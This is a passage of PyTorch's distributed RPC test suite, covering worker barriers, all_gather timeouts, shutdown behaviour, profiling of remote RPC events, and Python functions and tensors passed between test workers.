dist.barrier()
def test_wait_all_workers_dense(self):
self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def _wait_all_workers_twice(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
        # worker1/2 call this immediately and still have some work after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice_dense(self):
self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
        # This test validates the implementation of barrier when multiple threads call into it.
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
        # prefixed when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
                # Note: we don't assert that every remote event must appear in the
                # above set; the set is just a representative sample of what we
                # expect to see. The profiler can change and add more events, but
                # this representative set should always be present.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
            # The set should be empty; otherwise, its remaining elements did not
            # show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
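        # Helper: issues a single torch.mul RPC to the given destination rank and blocks
        # until it completes.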
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
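        # Profiles slow_async_add, which internally issues a nested RPC from dst1 to dst2,
        # and verifies that both the nested RPC event and its remote add are recorded with
        # the correct profiling keys and node ids.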
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
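        # Checks that the profile collected around run_profiling_workload contains the
        # remote aten::mul event attributed to the destination worker.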
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
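        # Common driver: on rank 1, runs `func` over the given RPC mode (sync/async/remote)
        # under the profiler, optionally inside a record_function scope, then validates the
        # recorded RPC event, the remote events, and (if used) the enclosing scope ordering.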
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
                # Since the RPC call is within the scope, its CPU interval should be
                # contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
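        # Extracts top-level (non-nested) events from each thread's event list by keeping
        # only events that start after the previously kept event ended, then compares the
        # sorted names against the expected list.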
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
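        # Runs two nested server-side process-global profilers on the destination worker and
        # checks that the inner one captures only aten::sub while the outer one captures both
        # aten::sub and aten::add.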
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
